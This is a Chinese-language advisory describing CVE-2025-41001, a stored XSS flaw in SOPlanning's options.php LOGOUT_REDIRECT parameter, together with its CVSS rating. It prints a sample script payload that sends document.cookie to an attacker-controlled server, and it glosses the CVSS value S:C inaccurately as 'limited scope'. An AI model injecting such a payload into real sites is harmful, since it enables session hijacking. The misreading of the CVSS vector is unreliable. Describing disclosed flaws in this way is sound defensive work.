CVE-2025-41001CVE-2025-41001是SOPlanning v1.53.02版本中存在的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞源于程序对用户输入缺乏充分的验证和过滤,具体表现在处理LOGOUT_REDIRECT参数时未进行安全校验。攻击者可以通过POST请求向/soplanning/www/process/options.php发送特制的恶意脚本,当其他认证用户访问相关页面时,存储的恶意代码会在其浏览器中执行,从而窃取用户的会话cookie信息,实现会话劫持攻击。由于该漏洞需要低权限用户发起攻击,且需要目标用户进行交互才能触发,因此CVSS评分仅为5.4(中危)。攻击成功后,攻击者可利用窃取的cookie冒充合法用户进行进一步的操作,对系统安全性构成威胁。
该漏洞属于存储型XSS(Stored Cross-Site Scripting)漏洞,攻击向量为网络远程攻击。漏洞点位于SOPlanning的选项处理页面(/soplanning/www/process/options.php),攻击者通过POST请求的LOGOUT_REDIRECT参数注入恶意JavaScript代码。由于程序未对用户输入进行HTML实体编码或输入验证,恶意脚本会被永久存储在服务器端。当其他用户访问包含该恶意数据的页面时,浏览器会解析并执行存储的XSS payload。攻击者通常构造的payload形式为:<script>document.location='攻击者控制的服务器?cookie='+document.cookie</script>,一旦脚本执行,用户cookie将被发送至攻击者服务器,实现会话劫持。CVSS向量显示该漏洞需要低权限认证用户发起攻击(PR:L),且需要目标用户进行一定交互(UI:R),攻击复杂度低(AC:L),影响范围有限(S:C)。